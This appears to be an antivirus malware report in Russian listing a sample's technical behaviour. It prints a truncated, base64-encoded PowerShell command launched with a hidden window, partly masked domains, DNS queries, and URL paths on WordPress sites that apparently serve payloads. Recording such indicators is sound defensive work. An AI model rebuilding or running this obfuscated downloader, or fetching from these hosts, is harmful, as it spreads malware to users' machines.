Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYADMAOQB1AHcAdwB0AD0AKAAnAFYAbAAnACsAKAAnAF8AZAAyACcAKwAnAHYAbAAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgBWADoAVQBTAEUAUgBwAFIATwBmAEkATA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1940
- %TEMP%\1233375.cvr
- 'pi######ervicesolutions.com':80
- 'pi######ervicesolutions.com':443
- 'fu####untwater.com':80
- 'fu####untwater.com':443
- 'te###ocorp.vn':80
- 'te###ocorp.vn':443
- 'yo###unds.com':80
- 'yo###unds.com':443
- 'rm###ongolf.com':80
- http://pi######ervicesolutions.com/stats/D4W/
- http://www.fu####untwater.com/wp-content/cg/
- http://te###ocorp.vn/wp-content/uploads/ZyU8/
- http://yo###unds.com/wp-includes/vnnRR/
- 'pi######ervicesolutions.com':443
- 'fu####untwater.com':443
- 'te###ocorp.vn':443
- DNS ASK pi######ervicesolutions.com
- DNS ASK ho####itypearl.com
- DNS ASK fu####untwater.com
- DNS ASK te###ocorp.vn
- DNS ASK tr###.##etigergroups.com
- DNS ASK yo###unds.com
- DNS ASK rm###ongolf.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYADMAOQB1AHcAdwB0AD0AKAAnAFYAbAAnACsAKAAnAF8AZAAyACcAKwAnAHYAbAAnACkAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgBWADoAVQBTAEUAUgBwAFIATwBmAEkATA...' (со скрытым окном)